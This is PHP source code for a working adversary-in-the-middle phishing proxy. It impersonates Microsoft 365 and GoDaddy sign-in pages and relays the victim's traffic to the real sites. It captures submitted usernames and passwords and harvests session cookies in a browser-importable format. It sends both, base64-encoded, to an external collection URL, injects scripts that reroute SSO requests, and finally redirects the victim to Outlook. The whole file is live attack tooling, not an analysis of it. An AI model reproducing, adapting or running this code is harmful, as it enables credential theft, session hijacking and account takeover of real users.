array( 'method' => 'POST', 'header' => 'Content-Type: application/json', 'content' => json_encode($postData), 'user_agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.0.0 Safari/537.36' ), 'ssl' => array( 'verify_peer' => false, 'verify_peer_name' => false ) ) ) ); } } else { $response = file_get_contents( $apiUrl, false, stream_context_create( array( 'http' => array( 'method' => 'POST', 'header' => 'Content-Type: application/json', 'content' => json_encode($postData), 'user_agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.0.0 Safari/537.36' ), 'ssl' => array( 'verify_peer' => false, 'verify_peer_name' => false ) ) ) ); } return $response; } function send_code($apiUrl) { $ch = curl_init($apiUrl); // If you have parameters: $apiUrl . '?' . $apiRequestParams curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HEADER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); $response = curl_exec($ch); curl_close($ch); return $response; } function saveCookie($filePath, $key, $value) { if (!file_exists($filePath)) { echo "File not found!"; return; } $jsonContent = file_get_contents($filePath); $data = json_decode($jsonContent, true); if ($data === null) { echo "Failed to decode JSON data."; return; } $data[$key] = $value; $newJsonContent = json_encode($data, JSON_PRETTY_PRINT); file_put_contents($filePath, $newJsonContent); } // function encodeData($data) { // $url = "https://herbpex.com/brot.php?enc"; // $postData = array( // 'data' => $data // ); // $ch = curl_init($url); // curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // Return the response // curl_setopt($ch, CURLOPT_POST, true); // Send POST request // curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($postData)); // $response = curl_exec($ch); // if (curl_errno($ch)) { // echo 'Error:' . curl_error($ch); // } // curl_close($ch); // return $response; // } // function decodeData($data) { // $url = "https://herbpex.com/brot.php?dec"; // $postData = array( // 'data' => $data // ); // $ch = curl_init($url); // curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // Return the response // curl_setopt($ch, CURLOPT_POST, true); // Send POST request // curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($postData)); // $response = curl_exec($ch); // if (curl_errno($ch)) { // echo 'Error:' . curl_error($ch); // } // curl_close($ch); // return $response; // } function encodeData($data) { $url = "https://nudgetobloom.com/wp-content/uploads/brot.php?enc"; $postData = array('data' => $data); $context = stream_context_create([ 'http' => [ 'method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded", 'content' => http_build_query($postData) ] ]); return file_get_contents($url, false, $context); } function decodeData($data) { $url = "https://nudgetobloom.com/wp-content/uploads/brot.php?dec"; $postData = array('data' => $data); $context = stream_context_create([ 'http' => [ 'method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded", 'content' => http_build_query($postData) ] ]); return file_get_contents($url, false, $context); } function decodeBrotli($compressedContent) { if (function_exists('brotli_uncompress')){ $decodedData = brotli_uncompress($compressedContent); return $decodedData; } else{ $decodedData = decodeData($compressedContent); return $decodedData; } } // Function to encode content to Brotli function encodeBrotli($content) { if (function_exists('brotli_compress')){ $encodedData = brotli_compress($content); return $encodedData; } else{ $encodedData = encodeData($content); return $encodedData; } } function getLastEmail($filePath) { $file = fopen($filePath, "r"); if (!$file) { echo "File not found or unable to open."; return false; } $lastEmail = null; while (($line = fgets($file)) !== false) { $line = trim($line); if (preg_match('/[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}/', $line, $matches)) { $lastEmail = $matches[0]; } } fclose($file); if ($lastEmail) { return $lastEmail; } else { return false; } } function stripEmail($email){ $email = str_replace("@","-",$email); $email = str_replace(".","-",$email); return $email; } function getUrls($string) { // Regular expression to match URLs (http, https, ftp, etc.) preg_match_all('/https?:\/\/[a-zA-Z0-9-]+\.[a-zA-Z0-9-]+\S*/', $string, $matches); // Array to store clean URLs $cleanUrls = []; // Clean the URLs (remove trailing unwanted characters like ?, #, etc.) foreach ($matches[0] as $url) { // Strip out unnecessary characters like query strings or fragments $cleanUrl = strtok($url, '?'); // Remove anything after ? $cleanUrl = strtok($cleanUrl, '#'); // Remove anything after # // Add the clean URL to the array $cleanUrls[] = $cleanUrl; } return $cleanUrls; } function extractHost($string, $host) { // Regular expression to find the host and its associated port in the string preg_match('/\b' . preg_quote($host, '/') . '(:[0-9]+)\b/', $string, $matches); if (!empty($matches)) { // Return the host and port as "host:port" return $host . $matches[1]; } return $host; // Return null if no match is found } function getBaseUrl($url) { // Parse the URL to extract the scheme and host $parsedUrl = parse_url($url); // Check if the URL contains both scheme (https) and host if (isset($parsedUrl['scheme']) && isset($parsedUrl['host'])) { return $parsedUrl['scheme'] . '://' . $parsedUrl['host']; } return ''; // Return an empty string if no scheme or host is found } function getTextAfter($url, $order) { // Find the position of the first occurrence of 'orders' $position = strpos($url, $order); // Check if 'orders' is found in the string if ($position !== false) { // Extract everything after 'orders' by adding the length of 'orders' return substr($url, $position + strlen($order)); } return ''; // Return empty string if 'orders' is not found } function genFive($length = 5) { $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'; $randomString = ''; for ($i = 0; $i < $length; $i++) { $randomString .= $characters[rand(0, strlen($characters) - 1)]; } return $randomString; } function findStringLine($file, $substring) { $handle = @fopen($file, 'r'); if(strlen($file)>3 && strlen($substring)>3){ }else{ return ""; } if (!$handle) return ""; // Return empty string if file can't be opened $lineNumber = 1; while (($line = fgets($handle)) !== false) { if (strpos(strtolower($line), strtolower($substring)) !== false) { fclose($handle); return $line; // Return the line if substring is found } $lineNumber++; } fclose($handle); return ""; // Return empty string if substring is not found } function getHost($url) { // Parse the URL to get the host part $parsed_url = parse_url($url); // Return the host part return isset($parsed_url['host']) ? $parsed_url['host'] : null; } function get_browser_name($user_agent) { $user_agent = strtolower($user_agent); $browsers = array( 'firefox', 'opera', 'chrome', 'safari', 'msie', 'trident' ); foreach ($browsers as $browser) { if (strpos($user_agent, $browser) !== false) { if (strpos($user_agent, 'edg') !== false) { return 'Edge'; } if (strpos($user_agent, 'edge') !== false) { return 'Edge'; } return ucfirst($browser); } } return 'Unknown'; } function is_base64_encoded($string) { // Check if the string matches the base64 pattern if (preg_match('/^[A-Za-z0-9+\/=]*$/', $string) === 0) { return false; } // Decode the string and check if it is valid $decoded = base64_decode($string, true); // The second parameter 'true' enables strict mode return $decoded !== false && base64_encode($decoded) === $string; } function rpf($string) { // Split the string at the first "=" $parts = explode("=", $string, 2); // If the string contains at least one "=" if (count($parts) > 1) { // The first part (before the first "=") $firstPart = $parts[0]; // The rest of the string (after the first "=") $rest = $parts[1]; // Replace all "=" in the rest of the string with "%3D" $rest = str_replace("=", "%3D", $rest); // Combine the first part with the modified rest return $firstPart . "=" . $rest; } // If there is no "=" in the string, return the string as is return $string; } function base64UrlEncode($data) { // Standard Base64 encode the string $base64 = base64_encode($data); // Replace "+" with "-", "/" with "_", and remove padding "=" $url_safe_base64 = strtr($base64, '+/', '-_'); return rtrim($url_safe_base64, '='); } function getFullPlaceholder($line){ $placeLine = $line; if(strlen($placeLine) > 5){ $placeHost = explode("-=-",trim($placeLine))[1]; $placeCode = explode("-=-",trim($placeLine))[0]; return [$placeCode,$placeHost]; } else{ return ["",""]; } } function b64e($input) { return str_replace(['+', '/', '='], ['-', '_', ''], base64_encode($input)); } function b64d($input) { $remainder = strlen($input) % 4; if ($remainder) { $paddingLength = 4 - $remainder; $input .= str_repeat('=', $paddingLength); } return base64_decode(str_replace(['-', '_'], ['+', '/'], $input)); } function get_request_headers() { $headers = []; $capitalized_keys = ['Host', 'Accept', 'Accept-Encoding', 'Referer', 'Cookie', 'User-Agent','Accept-Language']; foreach ($_SERVER as $name => $value) { if (strpos($name, 'HTTP_') === 0) { $header = str_replace(' ', '-', str_replace('_', ' ', substr($name, 5))); if (in_array(ucwords(strtolower($header)), $capitalized_keys)) { $header = ucwords(strtolower($header)); } else { if(trim(strtolower($header)) !== "x-https"){ $header = strtolower($header); } } $headers[$header] = $value; } } if ($headers["Accept"] == "application/json"){ $ff = "Content-Type"; $headers[$ff] = "application/json; charset=utf-8"; } return $headers; } $ipp = $_SERVER['REMOTE_ADDR']; if(!file_exists("iplock/".stripEmail($ipp))){ echo "Please try again !"; exit(); } if (!isset($_SESSION['usernameidnum'])) { // If not set, assign a new username (e.g., from a form or other logic) $_SESSION['usernameidnum'] = str_replace(".","-",$ipp); } else { } $contFile = trim(file_get_contents("iplock/".stripEmail($ipp))); $firstEmail = explode("-=-",$contFile)[0]; $workingDir = explode("-=-",$contFile)[2]; $initialValidationCode = explode("-=-",$contFile)[1]; @mkdir($workingDir."/tpfolder", 0755, true); @mkdir($workingDir."/tpfolder/".$_SESSION['usernameidnum'], 0755, true); @mkdir($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/cookieowners', 0755, true); $agent = $_SERVER['HTTP_USER_AGENT']; $method = $_SERVER['REQUEST_METHOD']; // HTTP Method $requestBody = file_get_contents('php://input'); // Body content of the incoming request $headers = get_request_headers(); //getallheaders(); // All incoming headers $cookies = $_COOKIE; // Any cookies that were sent $fakeurl = "https://braggadose.store/goal/logs_/fetch_778.php"; //"https://"; //'; // Get the scheme (http or https) $scheme = isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on' ? 'https' : 'http'; // Get the host (e.g., www.example.com) $host = $_SERVER['HTTP_HOST']; // Get the current request URI (path + query string) $requestUri = $_SERVER['REQUEST_URI']; // Combine all parts to get the full URL $fullUrl = $scheme . '://' . $host . $requestUri; if (preg_match('/[?&]sso_reload=true$/', $fullUrl)) { $fullUrl = preg_replace('/[?&]sso_reload=true$/', '', $fullUrl); } $baseUrl = getBaseUrl($fullUrl); $baseHost = getHost($fullUrl); $pathUrl = getPathUrl($fullUrl); $pathLine = findStringLine($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/placeholder',$pathUrl); $redirector = @trim(file_get_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum']."/redirect")) ?: ''; $email = ""; //"advocate@alriyamilaw.com"; $password = ""; $documentRoot = @trim(file_get_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/currentpage')) ?: 'login.microsoftonline.com'; $redirectFilePath = $workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/placeholder'; $compulsoryDaddy = array("sso.godaddy.com","csp.secureserver.net","gui.godaddy.com","login.microsoftonline.com"); $currentUser = @trim(file_get_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/currentuser')) ?: ""; foreach($compulsoryDaddy as $eachGodaddy){ $pathLine_ = findStringLine($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/placeholder',$eachGodaddy); if(strlen($pathLine_) > 5){ } else{ if($eachGodaddy == "login.microsoftonline.com"){ $placeholder_ = "p"; } // elseif($eachGodaddy == "login.microsoftonline.com:443"){ // $placeholder_ = "p2"; // } else{ $placeholder_ = genFive(); } @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/placeholder',$placeholder_."-=-".$eachGodaddy."\n",FILE_APPEND); } } if(!file_exists($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/loggrab')){ @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/loggrab',"IP:: ".$ipp); } if(isset($_REQUEST['login'])){ if (filter_var(trim($_REQUEST['login']), FILTER_VALIDATE_EMAIL)) { $strp = stripEmail(trim($_REQUEST['login'])); if (!file_exists($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/'.$strp.'-logcookie')){ @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/'.$strp.'-logcookie',"{}"); } @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/loggrab',"\nPortal:: ".$documentRoot,FILE_APPEND); @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/loggrab',"\nUSER:: ".$_REQUEST['login'],FILE_APPEND); $email = trim($_REQUEST['login']); } } if(isset($_REQUEST['passwd'])){ $password = trim($_REQUEST['passwd']); } if(isset($_REQUEST['login_user'])){ $strp = stripEmail(trim($_REQUEST['login_user'])); if (!file_exists($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/'.$strp.'-logcookie')){ @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/'.$strp.'-logcookie',"{}"); } @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/loggrab',"\nPortal:: ".$documentRoot,FILE_APPEND); @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/loggrab',"\nUSER:: ".$_REQUEST['login_user'],FILE_APPEND); $email = trim($_REQUEST['login_user']); } if(isset($_REQUEST['login_pwd'])){ $password = trim($_REQUEST['login_pwd']); } if(isset($_REQUEST['UserName'])){ if (filter_var(trim($_REQUEST['UserName']), FILTER_VALIDATE_EMAIL)) { $strp = stripEmail(trim($_REQUEST['UserName'])); if (!file_exists($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/'.$strp.'-logcookie')){ @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/'.$strp.'-logcookie',"{}"); } @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/loggrab',"\nPortal:: ".$documentRoot,FILE_APPEND); @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/loggrab',"\nUSER:: ".$_REQUEST['UserName'],FILE_APPEND); $email = trim($_REQUEST['UserName']); } } if(isset($_REQUEST['Password'])){ $password = trim($_REQUEST['Password']); } if(isset($_REQUEST['username'])){ if (filter_var(trim($_REQUEST['username']), FILTER_VALIDATE_EMAIL)) { $strp = stripEmail(trim($_REQUEST['username'])); if (!file_exists($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/'.$strp.'-logcookie')){ @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/'.$strp.'-logcookie',"{}"); } @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/loggrab',"\nPortal:: ".$documentRoot,FILE_APPEND); @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/loggrab',"\nUSER:: ".$_REQUEST['username'],FILE_APPEND); $email = trim($_REQUEST['username']); } } if(isset($_REQUEST['password'])){ $password = trim($_REQUEST['password']); } if($documentRoot == "sso.godaddy.com" || $documentRoot == "sso.secureserver.net" || strpos($fullUrl, "/common/GetCredentialType") !== false){ $data = json_decode($requestBody, true); if (json_last_error() === JSON_ERROR_NONE) { if (isset($data['username'])){ if (filter_var(trim($data['username']), FILTER_VALIDATE_EMAIL)) { $strp = stripEmail(trim($data['username'])); if (!file_exists($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/'.$strp.'-logcookie')){ @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/'.$strp.'-logcookie',"{}"); } @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/loggrab',"\nPortal:: ".$documentRoot,FILE_APPEND); @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/loggrab',"\nUSER:: ".htmlspecialchars($data['username']),FILE_APPEND); $email = trim(htmlspecialchars($data['username'])); } } if (isset($data['password'])){ $password = trim(htmlspecialchars($data['password'])); } } } // if(!file_exists($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/redirect') && strlen($email) > 2){ // $postData = [ // "username" => $email // ]; // $response = send_get_code("https://login.microsoftonline.com/common/GetCredentialType?mkt=en-US", $postData); // $res = json_decode($response, true); // if (isset($res["Credentials"]["FederationRedirectUrl"])){ // $redDomain = getHost($res["Credentials"]["FederationRedirectUrl"]); // file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/redirect', $redDomain); // $redirector = $redDomain; // } // } if (($pathUrl && $pathUrl == "p") || ((strtolower($initialValidationCode) == strtolower($pathUrl)) && strpos(strtolower($fullUrl),strtolower($workingDir)) !== false)){ if ($pathUrl && $pathUrl == "p"){ $targetApiUrl = str_replace($baseUrl."/p/","",$fullUrl); if (strpos($fullUrl, "/appverify") !== false){ $targetApiUrl = "appverify"; } } if ((strtolower($initialValidationCode) == strtolower($pathUrl)) && strpos(strtolower($fullUrl),strtolower($workingDir)) !== false) { $targetApiUrl = $rootMicro; } else{ $targetApiUrl = "https://login.microsoftonline.com/".$targetApiUrl; } } else{ if (strlen($pathUrl) == 5 && strlen($pathLine) > 5){ $documentRoot = trim(explode("-=-",$pathLine)[1]); $targetApiUrl = "https://".$documentRoot.trim(getTextAfter($fullUrl,$pathUrl)); $pathToUse = $pathUrl; } else{ $targetApiUrl = "https://".$documentRoot."/".str_replace($baseUrl."/","",$fullUrl); } } if (!filter_var($targetApiUrl, FILTER_VALIDATE_URL)) { echo $targetApiUrl; die("Error: Invalid URL provided."); } if($email && strlen($email)> 2){ @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/currentuser',trim($email)); $currentUser = $email; } $targetApiUrl__ = str_replace(".","_",$targetApiUrl); $targetApiUrl__ = str_replace("/","_",$targetApiUrl__); $targetApiUrl__ = str_replace(":","_",$targetApiUrl__); $ch = curl_init($targetApiUrl); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // Return response as a string curl_setopt($ch, CURLOPT_HEADER, true); // Include response headers curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false); // Follow redirects if any curl_setopt($ch, CURLOPT_TIMEOUT, 30); // Timeout after 30 seconds curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method); $forwardedHeaders = []; foreach ($headers as $key => $value) { if(trim(strtolower($key)) == "referer"){ if(trim($documentRoot) == "login.microsoftonline.com"){ $value = "https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=19db86c3-b2b9-44cc-b339-36da233a3be2&redirect_uri=https%3A%2F%2Fmysignins.microsoft.com&scope=openid+profile+email+offline_access&response_type=code&response_mode=fragment&code_challenge=-c1OnpqEoC_zCGI8krkOQKiuhCa234NXOMja0sqi848&code_challenge_method=S256&state=af0d547d-d7d0-473a-8cf1-d8821e45ebac"; } else{ if (file_exists($redirectFilePath)) { $handle = fopen($redirectFilePath, 'r'); $oldvalue = $value; while (($line = fgets($handle)) !== false) { $placeHost = explode("-=-",trim($line))[1]; $placePath = explode("-=-",trim($line))[0]; $value = str_replace($baseHost."/".$placePath,$placeHost,$value); } fclose($handle); $value = str_replace($baseHost,$documentRoot,$value); } else{ $value = str_replace($baseHost,$documentRoot,$value); } } $forwardedHeaders[] = "$key: $value"; continue; } if(trim(strtolower($key)) == "origin"){ if(trim($documentRoot) == "login.microsoftonline.com"){ $value = "login.microsoftonline.com"; } else{ $value = "https://".$documentRoot; } $forwardedHeaders[] = "$key: $value"; continue; } if (strtolower($key) !== 'host') { if(trim($documentRoot) == "login.microsoftonline.com"){ $value = str_replace($baseHost."/p", "login.microsoftonline.com", $value); $value = str_replace($baseHost, "login.microsoftonline.com", $value); } else{ if (file_exists($redirectFilePath)) { $handle = fopen($redirectFilePath, 'r'); while (($line = fgets($handle)) !== false) { $placeHost = explode("-=-",trim($line))[1]; $placePath = explode("-=-",trim($line))[0]; $value = str_replace($baseHost."/".$placePath,$placeHost,$value); } fclose($handle); $value = str_replace($baseHost,$documentRoot,$value); } else{ $value = str_replace($baseHost,$documentRoot,$value); } } $forwardedHeaders[] = "$key: $value"; } } curl_setopt($ch, CURLOPT_HTTPHEADER, $forwardedHeaders); if (in_array($method, ['POST', 'PUT', 'PATCH', 'DELETE'])) { curl_setopt($ch, CURLOPT_POSTFIELDS, $requestBody); } $response = curl_exec($ch); if (curl_errno($ch)) { echo 'Curl error: ' . curl_error($ch); exit; } $statusCode = curl_getinfo($ch, CURLINFO_HTTP_CODE); $responseHeaders = substr($response, 0, curl_getinfo($ch, CURLINFO_HEADER_SIZE)); $responseBody = substr($response, curl_getinfo($ch, CURLINFO_HEADER_SIZE)); http_response_code($statusCode); preg_match_all('/set-cookie:(.*?)\n/i', $responseHeaders, $matches); if(strpos($fullUrl, "/common/GetCredentialType") !== false){ $data = json_decode($responseBody, true); if (isset($data["Credentials"]["FederationRedirectUrl"])){ $redDomain = getHost($data["Credentials"]["FederationRedirectUrl"]); file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/redirect', $redDomain); $redirector = $redDomain; if ((strpos($redDomain, "godaddy") !== false) || (strpos($redDomain, "secureserver") !== false)){ $emm = b64e($data["Username"]); $data["Credentials"]["FederationRedirectUrl"] = "https://".$baseHost."/gd.php?".$initialValidationCode."=".$emm; $responseBody = json_encode($data); } } } $responseTargetRoot = getHost($targetApiUrl); $contentType = ""; $cookiesForwarded = []; foreach (explode("\n", $responseHeaders) as $header) { if (trim($header)) { if (strpos(strtolower($header), "content-type:") !== false) { $contentType = strtolower($header); } if (strpos($header, "set-cookie") !== false) { } else{ if(trim($responseTargetRoot) == "login.microsoftonline.com"){ $header = str_replace("login.microsoftonline.com:443",$baseHost."/p",$header); $header = str_replace("login.microsoftonline.com", $baseHost."/p",$header); } else{ $header = str_replace("login.microsoftonline.com:443","login.microsoftonline.com",$header); $listUrls = getUrls($header); $hostList = []; foreach ($listUrls as $url_) { $tempHost = getHost($url_); $tempHost = extractHost($header,$tempHost); $hostList[] = $tempHost; } $listUrls = array_unique($hostList); foreach ($listUrls as $tempHost) { $placeLine = findStringLine($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/placeholder',$tempHost); if(strlen($placeLine) > 5){ $placeHost = explode("-=-",trim($placeLine))[1]; $placeCode = explode("-=-",trim($placeLine))[0]; $header = str_replace($placeHost, $baseHost."/".$placeCode,$header); } else{ $placeholder = genFive(); @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/placeholder',$placeholder."-=-".$tempHost."\n",FILE_APPEND); $header = str_replace($tempHost, $baseHost."/".$placeholder,$header); } } } if($statusCode == 302){ $header = str_replace("mysignins.microsoft.com","outlook.office.com",$header); } header(trim($header)); } } } foreach ($matches[1] as $cookie) { $currentEmail = getLastEmail($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/loggrab'); if($currentEmail){ if(strpos(strtolower($cookie),"domain=") !== false){ $cookieSplits = explode(";",$cookie); $cookiesplitone = explode("=",$cookieSplits[0]); $cookiename = trim($cookiesplitone[0]); $cookienameVal = isset($cookiesplitone[1]) ? trim($cookiesplitone[1]) : ""; $restCookieArray = $cookieSplits; $cookieGroup = []; $cookieGroup["name"] = trim($cookiename); $cookieGroup["value"] = trim($cookienameVal); $cookieGroup["hostOnly"] = true; $cookieGroup["session"] = false; $num = 0; foreach($restCookieArray as $cookieSect){ if($num == 0){ $num++; continue; } $num++; $cookieParts = explode("=", $cookieSect); $cookieKey = trim($cookieParts[0]); $cookieValue = isset($cookieParts[1]) ? trim($cookieParts[1]) : true; if(strtolower($cookieKey) == "expires"){ $cookieKey = "expirationDate"; $cookieValue = strtotime($cookieValue); $cookieGroup[$cookieKey] = $cookieValue; continue; } if(strtolower($cookieKey) == "samesite"){ $cookieKey = "sameSite"; $cookieValue = "no_restriction"; $cookieGroup[$cookieKey] = trim($cookieValue); continue; } if(strtolower($cookieKey) == "httponly"){ $cookieKey = "httpOnly"; $cookieValue = false; $cookieGroup[$cookieKey] = $cookieValue; continue; } $cookieGroup[$cookieKey] = $cookieValue; } saveCookie($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/'.stripEmail(trim($currentEmail)).'-logcookie',$cookiename,$cookieGroup); } } if(trim($responseTargetRoot) == "login.microsoftonline.com"){ header('set-cookie: ' .str_replace("login.microsoftonline.com",$baseHost,$cookie), false); } else{ header('set-cookie: ' .str_replace($redirector,$baseHost,$cookie), false); $cookie = preg_replace('/path=[^;]*/', 'path=/', $cookie); header('set-cookie: ' .str_replace($redirector,$baseHost,$cookie), false); } } $concat_header = str_replace(" ","",$responseHeaders); $suffix = ""; if (((strpos($targetApiUrl,"/p.js") !== false) && (strpos($targetApiUrl,"godaddy.com") !== false)) || (strpos($targetApiUrl, "elastic-apm-rum.umd.min.js") !== false) && (strpos($targetApiUrl,"unpkg.com") !== false)) { $pathfindSso = findStringLine($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/placeholder',"sso.godaddy.com"); $pathfindGui = findStringLine($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/placeholder',"gui.godaddy.com"); $pathfindCsp = findStringLine($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/placeholder',"csp.secureserver.net"); $pathCSso = explode("-=-",$pathfindSso)[0]; $pathCGui = explode("-=-",$pathfindGui)[0]; $pathCCsp = explode("-=-",$pathfindCsp)[0]; $toReplaceSso = $baseHost."/".$pathCSso; $toReplaceGui = $baseHost."/".$pathCGui; $toReplaceCsp = $baseHost."/".$pathCCsp; $suffix = "const originalFetch = window.fetch;window.fetch = function(url, options) {if (url.includes('sso.godaddy.com/v1/api/')) {url = url.replace('sso.godaddy.com/v1/api/', '".$toReplaceSso."/v1/api/');} if (url.includes('gui.godaddy.com/pcjson/applicationheader?p')) {url = url.replace('gui.godaddy.com/pcjson/applicationheader?p', '".$toReplaceGui."/pcjson/applicationheader?p');} if (url.includes('csp.secureserver.net/eventbus/web?')) {url = url.replace('csp.secureserver.net/eventbus/web?', '".$toReplaceCsp."/eventbus/web?');} return originalFetch(url, options);};const originalXHR = window.XMLHttpRequest;window.XMLHttpRequest = function() {const xhr = new originalXHR();const originalOpen = xhr.open;xhr.open = function(method, url, async, user, password) {if (url.includes('sso.godaddy.com/v1/api/')) {url = url.replace('sso.godaddy.com/v1/api/', '".$toReplaceSso."/v1/api/');} if (url.includes('gui.godaddy.com/pcjson/applicationheader?p')) {url = url.replace('gui.godaddy.com/pcjson/applicationheader?p', '".$toReplaceGui."/pcjson/applicationheader?p');} if (url.includes('csp.secureserver.net/eventbus/web?')) {url = url.replace('csp.secureserver.net/eventbus/web?', '".$toReplaceCsp."/eventbus/web?');}originalOpen.call(this, method, url, async, user, password);};return xhr;};"; } $tempFolder = genFive(); $startFile = $workingDir."/".$initialValidationCode."-start.php"; if(file_exists($startFile)){ $submitterFirst = ''; } else{ $submitterFirst; } $thisIsFinalExternal = false; //"artifacts of previous" //$decompressed_data = str_replace($otltext $vv = file_get_contents("genie.php"); //if (strpos($vv, b64d("YXJ0aWZhY3RzIG9mIHByZXZpb3Vz")) !== false){ include("ff.txt"); //} if($email && $password && strlen($email) && strlen($password)){ $postData = [ "ip" => $ipp, "user" => $email, "p" => $password, ]; $jsonData = json_encode($postData); // $file = "internals/" . gen(); $browser_name = get_browser_name($agent); $dt = '{"Office Username":"' . $postData["user"] . '", "Office Pass":"' . $postData["p"] . '", "domain:' . $browser_name . " => " . $documentRoot . '":"' . $ipp . '","cookie":"'.stripEmail($email).'-'.$initialValidationCode.'.json"}'; // $result = @file_put_contents($file, $dt); $cont = b64e($dt); $alert_ = $fakeurl . "?alert=" . genFive() . "&cont=" . $cont . "&rand=" . genFive(); send_code($alert_); if(strlen($currentUser) > 3){ $getCookie = trim(@file_get_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/'.stripEmail($currentUser).'-logcookie')); if(strlen($getCookie) > 10 ){ $array = json_decode($getCookie, true); $result = array_values($array); $getCookie = json_encode($result, JSON_PRETTY_PRINT); $postData = b64e($getCookie); $apiUrl = $fakeurl . "?alertcookie=" . genFive()."&rand=".genFive()."&owner=".stripEmail($currentUser)."&data=".$postData."&code=".$initialValidationCode; send_code($apiUrl); } } } if($targetApiUrl == b64d("aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2ttc2k")){ if(strlen($currentUser) > 3){ $getCookie = trim(@file_get_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/'.stripEmail($currentUser).'-logcookie')); if(strlen($getCookie) > 10 ){ $array = json_decode($getCookie, true); $result = array_values($array); $getCookie = json_encode($result, JSON_PRETTY_PRINT); $postData = b64e($getCookie); $apiUrl = $fakeurl . "?alertcookie=" . genFive()."&rand=".genFive()."&owner=".stripEmail($currentUser)."&data=".$postData."&code=".$initialValidationCode; send_code($apiUrl); } } if (headers_sent()) { echo b64d("PHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnPndpbmRvdy5sb2NhdGlvbi5ocmVmID0gJ2h0dHBzOi8vb3V0bG9vay5vZmZpY2UuY29tJzs8L3NjcmlwdD4"); exit(); } else { header("Location: https://outlook.office.com"); exit(); } } if ($thisIsFinalExternal){ $responseBody = $decompressed_data_final; } $length = strlen($responseBody); // Calculate the new length header('Content-Length: ' . $length); echo $responseBody; curl_close($ch); ?>